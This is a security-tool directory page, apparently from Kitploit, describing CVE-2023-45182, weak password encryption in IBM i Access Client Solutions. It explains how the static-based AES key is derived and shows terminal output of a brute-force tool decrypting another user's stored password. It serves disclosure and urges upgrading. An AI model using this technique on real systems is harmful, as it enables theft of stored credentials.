Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-45182 — IBM i Access Client Solutions < 1.1.9.4 - Cifrado de contraseñas débil | Kitploit
Herramientas/GitHubGitHub/afine-com/cve-2023-45182
Descifrado de ContraseñasHerramientas de Cifrado/DescifradoAnálisis de VulnerabilidadesExplotaciónCriptografía
GitHubafine-com/cve-2023-45182

CVE-2023-45182

IBM i Access Client Solutions < 1.1.9.4 - Cifrado de contraseñas débil

Ver Repositorio
hace 2 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-45182

IBM i Access Client Solutions < 1.1.9.4 - Cifrado débil de contraseñas

Cronología

  • Vulnerabilidad reportada al proveedor: 22.09.2023
  • Nueva versión corregida 1.1.9.4 publicada: 08.12.2023
  • Divulgación pública: 15.12.2023

Descripción

IBM i Access Client Solutions, para almacenar las contraseñas de los usuarios, utiliza el algoritmo AES; sin embargo, la clave de cifrado de 16 bytes es la combinación de una cadena estática (Thanatos) y caracteres aleatorios de una cadena que consiste en otra cadena estática (Behemoth) combinada con el nombre de usuario, la carpeta de inicio del usuario, el sistema operativo (por ejemplo Linux) y el directorio actual donde se inició la aplicación. Como resultado, la mitad de la clave de cifrado es estática (cadena Thanatos), mientras que la segunda mitad es muy limitada. Esto hace que sea muy fácil para un atacante forzar la contraseña por fuerza bruta incluso con un solo núcleo de CPU.

Aquí hay un ejemplo de descifrado de contraseña del usuario mmajchrowicz utilizando el script as400_password_bruteforce_tool.java desde la cuenta mkubiak:

root@kitploit:~
┌──(mkubiak㉿localhost)-[/tmp/mkubiak]
└─$ java as400_password_bruteforce_tool.java mmajchrowicz_funciton_admin_work.bin Linux mmajchrowicz /opt

IBM AS400 Password Bruteforce Tool v0.3 by Michał Majchrowicz AFINE Team

Full keyspace: mmajchrowiczLinux/opt/home/mmajchrowiczBehemoth
Full keyspace length: 47

Reduced keyspace: BmajchrowizLnux/pte
Reduced keyspace length: 19

Found good pass: Thanatosaun/Lcmo

Encrypted system password 7 bytes:
2E 1B 10 0A 1B 0D 0A
Decrypted system password 7 bytes:
50 65 6E 74 65 73 74

Decrypted system password: Pentest

Este problema fue causado por la aplicación de un cifrado de contraseñas débil. Este problema está corregido en IBM i Access Client Solutions 1.1.9.4.

Versiones afectadas

< 1.1.9.4

Aviso

Actualice IBM i Access Client Solutions a 1.1.9.4 o posterior.

Referencias

  • https://www.ibm.com/support/pages/node/7091942
  • https://nvd.nist.gov/vuln/detail/CVE-2023-45182
Descargar herramienta